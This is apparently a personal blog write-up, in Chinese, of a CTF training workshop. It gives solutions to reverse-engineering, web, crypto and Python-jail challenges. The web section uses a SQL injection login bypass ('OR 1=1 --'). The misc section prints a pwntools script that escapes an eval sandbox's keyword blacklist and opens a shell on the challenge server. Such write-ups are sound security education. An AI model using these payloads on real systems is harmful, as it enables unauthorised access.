國家資通安全院 - CTF 種子培訓工作坊

台中逢甲大學

Fri Jul 12 2024
572 words · 5 minutes
Daily writeup

前言

  • 排名 image

Welcome

就是welcome image

Reverse

Chosen 0

檔案丟到ida就能看到 image

Chosen 1

先丟到ida反編譯 去看看有沒有奇怪的

BOOL8 __fastcall checkFlag(const char *a1)
{
  char s2[64]; // [rsp+10h] [rbp-40h] BYREF
  generateFlag("Avada_Kedavra", s2);
  return strcmp(a1, s2) == 0;
}
int __fastcall generateFlag(_BYTE *a1, char *a2)
{
  _BYTE *v2; // rax
  __int64 i; // [rsp+18h] [rbp-8h]


  for ( i = 5381LL; ; i = 33 * i + (char)*v2 )
  {
    v2 = a1++;
    if ( !*v2 )
      break;
  }
return sprintf(a2, "NCKUCTF{%lu}", i);
}

解題程式

def generate_hash(s):
    h = 5381
    for c in s:
        h = 33 * h + ord(c)
    return h & 0xFFFFFFFFFFFFFFFF  # 保持為64位整數


input_str = "Avada_Kedavra"
hash_value = generate_hash(input_str)
flag = f"NCKUCTF{{{hash_value}}}"
print(flag)

Kazdle

去看題目的js 會發現正確的是第141個 image 找到第141個放進去就好了 NCKUCTF{allbeefneedispatience}

Web

Login Panel

如果我們用guest/guest登入的話再跳到/dashboard會因為不是admin所以拿不到flag 所以我們用sql injection就好

  • 帳號:admin
  • 密碼:'OR 1=1 -- 就進去了 image

Starburst Cat Shop

登入帳號隨便打 image 先用burp suite擋住 一直按buy,然後全部forward出去,就出來了 image

Crypto

Caesar

image image 得出位移了14格

RSA

丟去rsa decoder就好

e = 0x10001
n = 94222487035514568148220182471104690931780594128516176949111095868335830867719277805539132735917016524185107312037557600880949236829032793818738351079213184870243702834570026012503355620032058527302541127368383734031131208254140211165705925154251280613034133968327987267589895419787888903387665859859148412543
b64_c = 'N5lOVmbqGv0F1UiqdEy+T3Klilrwvp8cCZdLbnKPFWeqP9Mh/nzxtWC00G6GGPxmyMnOGdX9omDgxthlUAQGpaWeAnj84qrzU62Bq3m6RuP0pqE/wub6rMbHeK6gebgcd8GmUDX+gbhuLxtA4Z5+jyoyayi8t2xyCXHFtVXOm7Q='
int_c = 39042841328709556214265103020897101350928166266738871446328808453325125686468702532379771433443668090510537708890843833523366699079886852742174164548701470967388728724472159586068406789847736565656024626914080978879991724002842467193318864530876999109696543271802935281934399726950922142641870912695365966772

image

Vigenère

https://www.guballa.de/vigenere-solver 用這個網站解就好了 image

⊕ (XOR)

題目程式

#!/usr/bin/python3.10


from pwn import xor
from secret import flag, key


assert len(key) == 3


cipher = xor(flag, key).hex()


# transform the cipher into hex format
print(" ".join([cipher[i:i+2] for i in range(0, len(cipher), 2)]))

解題程式

from pwn import xor


ciphertext = '121f0213281b1b011c031a171c0c101c1c11000c08312a1c65001c1a63170b0006170611112e'
ciphertext_bytes = bytes.fromhex(ciphertext)


key = bytes([(ciphertext_bytes[0] ^ ord('F')),
             (ciphertext_bytes[1] ^ ord('L')),
             (ciphertext_bytes[2] ^ ord('A'))
             ])


decrypted_bytes = xor(ciphertext_bytes, key)
print(decrypted_bytes)

Nonce Nonce

加密程式

#!/usr/bin/python3.10


from secret import flag
from Crypto.Cipher import AES
from Crypto.Util.Counter import new
from os import urandom
from Crypto.Util.Padding import pad


key = urandom(16)
iv = urandom(4)


def encrypt(plain, key=key):
    ctr = new(128 , initial_value=int.from_bytes(iv, 'big'))
    aes = AES.new(key , mode=AES.MODE_CTR , counter=ctr)


    return aes.encrypt(pad(plain, 16))


print(encrypt(flag).hex())
print(encrypt(b"TSCCTF" * 6).hex())

解題程式

from Crypto.Util.strxor import strxor
import binascii
ciphertext1 = "a2dcf363fb24aee5fb6f56946710be19b9973e009339b5af3f6072985b3e51ab9162db9c5198e96f5ac81f14226b1de3"
ciphertext2 = "b0c3f167d42c95d8fb195d8000168e1fb2b85f0c974ad18d34076e936e1b6e9da052aea75198e96f5ac81f14226b1de3"
ct1 = binascii.unhexlify(ciphertext1)
ct2 = binascii.unhexlify(ciphertext2)
known_pt = b"TSCCTF" * 6
keystream = strxor(ct2, known_pt)
flag = strxor(ct1, keystream)


print("Flag:", flag)

misc

pyjail 1

nc 連進去會先看到

yih_0118@Macbook m774 % nc chall.nckuctf.org 8030
#!/usr/local/bin/python3


print(open(__file__).read())


inp = input(">>> ")
blacklist = ("import", "os", "system", "input", "eval", "exec", "open")
if not sum(bad in inp for bad in blacklist):
    print(eval(inp))
else:
    print("bad boyQQ")


>>>

可以看到是eval的漏洞 但是會先檢測是否含有blacklist中的==字==

>>> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7f1d37998c10>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/pyjail/jail.py', '__cached__': None, '__warningregistry__': {'version': 0}, 'inp': 'globals()', 'blacklist': ('import', 'os', 'system', 'input', 'eval', 'exec', 'open')}
from pwn import *
r = remote("chall.nckuctf.org", 8030)
p = "globals()['_'+'_builtins__'].__dict__['__i'+'mport__']('o'+'s').__dict__['s'+'ystem']('sh')"
r.sendlineafter(">>> ", p)
r.interactive()

進去之後 cat flag_432rdeoibhedqnjd即可 image

google form

去搜尋關鍵字就有了 image

Thanks for reading!

國家資通安全院 - CTF 種子培訓工作坊

Fri Jul 12 2024
572 words · 5 minutes
Daily writeup

© I-Hung Wu | CC BY-NC-SA 4.0

Share this article

Share preview for 國家資通安全院 - CTF 種子培訓工作坊
X (Twitter) Telegram Reddit Facebook Email

Table of Contents